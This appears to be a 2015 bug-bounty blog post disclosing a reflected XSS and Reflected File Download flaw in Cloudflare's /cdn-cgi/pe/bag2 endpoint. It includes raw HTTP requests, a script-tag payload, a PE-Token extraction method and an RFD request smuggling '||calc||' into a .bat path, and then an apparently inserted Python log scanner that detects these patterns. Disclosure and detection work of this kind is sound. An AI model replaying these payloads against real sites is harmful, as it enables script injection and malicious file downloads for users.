Monday, November 16, 2015

Cloudflare - when the firewall fails to protect itself

Hi,

A long time ago, I found an XSS vulnerability in http://securityundefined.com in the path


I reported it and it got fixed after a while.

The vulnerable parameter was (r[]), but I did not know that the path (/cdn-cgi/pe/bag2?r[]=) belongs to Cloudflare, so I did not look for

After that I was looking at some bug bounty program and got


I was surprised to see this path again, and I thought it might be vulnerable like the previous one.

So I sent a simple GET request:

GET /cdn-cgi/pe/bag2?r= HTTP/1.1
Host: xxxxxxxxxxxxxxxx.foo
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I got:

HTTP/1.1 405 Not Allowed
Date: Mon, 16 Nov 2015 16:17:42 GMT
Content-Type: text/html
Server: cloudflare-nginx
cf-ray: 246481f1dd7c08ea-CDG
Transfer-Encoding: chunked
Connection: Keep-Alive

What?! The website is not Cloudflare's, so why is the responding server Cloudflare? I understand that it uses Cloudflare services.

But how does it work? And why do I get (405 Not Allowed) in the response, when what I want is a (200 OK)!

I used a proxy to capture a clean HTTP request that gets the 200 OK:

GET /cdn-cgi/pe/bag2?r[]=http://foo.bar/xxx.js HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I saw the (PE-Token) in the request and changed (http://foo.bar/xxx.js) to (<script>alert(1)</script>).

Firefox: nothing!
IE 9, 10, 11: the XSS works!!

After some looking, the content type of the response was set to (Content-Type: multipart/mixed), which is why IE read it as an HTML page and the JS executed.

But here is the problem: where can I get a (PE-Token)?
Solution: when you get a (405 Not Allowed) response, you are served a simple page.

If you view the source code you will see:

<head><title>405 Not Allowed</title><script type="text/javascript">
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:1438806465,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"xxxxxxxxxxx",petok:"1181d2a8d2f71217d89f9a70eb521bd7334e1a25-1438819567-1800",betok:"6ac82112672bec8b142092f8509e441fc0771df0-1438819567-120",zone:"salesforce.com",rocket:"0",apps:{"clky":{"sid":"xxxx","uid":"xxxx"}}}];!function(a,b){a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=d134393e0a/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){};
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>

The petok value is the PE-Token.

Now we can make a PoC, if we have a permissive crossdomain policy that allows cross-domain requests.
I did not find a website like that, so it was just a scenario.

I see that many websites use this service from Cloudflare.

Here are some of them, with the XSS:

There are many more.

And you can use it as RFD (Reflected File Download):

GET /cdn-cgi/pe/bag2;/update.bat?r[]=%22FOO:BAR\%22||calc||%22
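From the defender's side, both variants above (HTML reflected through r[] and the ;/file.bat path suffix used for RFD) leave a recognisable shape in web-server access logs. The script below is an added example, not code from the post or from Cloudflare: it parses combined-format log lines (the sample lines are constructed for this example, and only the request targets mirror what the post shows), looks only at requests to the /cdn-cgi/pe/bag2 path, and flags a line when the reflected r parameter carries an HTML tag or shell metacharacters, or when the path ends in a script-like extension after a ;/ separator. The extension list beyond .bat and the choice of metacharacters are assumptions, not something the post states.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined-style format). They are made up
# for this example; only the request targets echo what the post describes.
LOG_LINES = [
    r'203.0.113.5 - - [16/Nov/2015:16:17:42 +0000] "GET /cdn-cgi/pe/bag2?r[]=http://foo.bar/xxx.js HTTP/1.1" 200 512',
    r'203.0.113.9 - - [16/Nov/2015:16:18:01 +0000] "GET /cdn-cgi/pe/bag2?r[]=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 301',
    r'203.0.113.9 - - [16/Nov/2015:16:18:07 +0000] "GET /cdn-cgi/pe/bag2;/update.bat?r[]=%22FOO:BAR\%22||calc||%22 HTTP/1.1" 200 77',
    r'203.0.113.2 - - [16/Nov/2015:16:19:30 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

# Minimal parser for the combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

BAG2_PATH = "/cdn-cgi/pe/bag2"
# Anything that looks like the start of an HTML tag inside the reflected value.
TAG_RE = re.compile(r"<\s*/?\s*[a-z!]", re.I)
# A ";/name.ext" suffix on the bag2 path, the trick that gives a downloaded
# file a script-like name (extension list is an assumption for this example).
RFD_SUFFIX_RE = re.compile(r";/[^/?]*\.(bat|cmd|exe|vbs|ps1|hta)$", re.I)


def reflected_values(query: str) -> List[str]:
    """Return every value passed to the reflected r parameter (r, r[], r[0], ...)."""
    params = parse_qs(query, keep_blank_values=True)  # parse_qs also percent-decodes
    return [v for key, vals in params.items() if key == "r" or key.startswith("r[") for v in vals]


def classify_target(target: str) -> List[str]:
    """Return a sorted list of reasons a request target is suspicious (empty if benign)."""
    parts = urlsplit(target)
    if not parts.path.startswith(BAG2_PATH):
        return []
    reasons = set()
    if RFD_SUFFIX_RE.search(parts.path):
        reasons.add("rfd-path-suffix")
    for value in reflected_values(parts.query):
        if TAG_RE.search(value):
            reasons.add("html-tag-in-r")
        if "||" in value or "&&" in value:
            reasons.add("shell-metachar-in-r")
    return sorted(reasons)


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Parse each log line and collect the ones whose bag2 request looks malicious."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = classify_target(m.group("target"))
        if reasons:
            findings.append({"ip": m.group("ip"), "target": m.group("target"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding["ip"], finding["target"], ",".join(finding["reasons"]))
```

Run against the constructed lines, the benign Rocket Loader fetch and the unrelated /index.html request pass, while the reflected-script line and the RFD line are reported with their reasons. The same classify_target function can be pointed at any other endpoint that echoes a query parameter by changing BAG2_PATH.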

I reported it to Cloudflare; they marked it as N/A but fixed it anyway.

Done!!